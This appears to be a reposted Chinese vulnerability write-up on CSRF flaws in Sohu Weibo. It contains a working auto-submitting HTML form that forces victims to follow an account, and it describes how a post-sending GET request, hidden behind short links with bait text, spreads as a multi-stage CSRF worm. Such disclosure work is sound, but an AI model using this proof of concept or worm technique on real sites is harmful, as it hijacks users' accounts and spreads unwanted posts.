好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全

1)CSRF刷粉丝

搜狐对于[xxx.t.sohu.com]这样的域名均未校验referer,例子POC如下:

< html >

<body>

<form id="se55i0n" name="se55i0n" action="http://ourhome.t.sohu.com/follow/addfollows" method="POST">

<input type="text" name="friendids" value="3262276" />

<input type="text" name="uid" value="3262276" />

<input type="submit" value="submit" />

</form>

<script>

document.se55i0n.submit();

</script>

</body>

</html>

 

2)CSRF蠕虫

2.1)无意间发现搜狐,有个像分析推荐某某微博的功能,点击推荐搜狐官方微博并抓包;

 

 

 

Host: t.sohu.com

Proxy-Connection: keep-alive

Origin: http://t.sohu.com

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip,deflate,sdch

Cookie: ...

 

2.2)试着改为GET请求,居然成功了(太不应该了),请求成功后会发送一条微博;

 

 

看测试效果;

 

 

2.3)经过后面的测试,发现[msg]的内容和uid参数也是能够完全掌控的,所以这就给了我们机会来小玩一次csrf蠕虫。将下面的GET请求伪装成一个短地址,再配上诱人的内容;

 

 

 

看效果图,:D

 

2.4)好吧,想让它多传播几次,我们只需要将上面的转换好了的短地址再出入到msg内容里,并将其再转换地址,这样就具备了2次传播的功能,当然可不止这么一种玩法哟;

 

哈哈,我们还是看效果吧(想几次传播你说了算);

 

 

2.5)一个较完整的二次传播测试效果,哈哈(发个微博诱惑大家点击,用户点击后形成第一次传播,用户的粉丝再点击形成第二次传播,当然还可以第三次、第四次....)

 

 

 

PS:仅仅自己测试,我木有粉丝哈哈!

 

查看更多关于搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全的详细内容...

  阅读:49次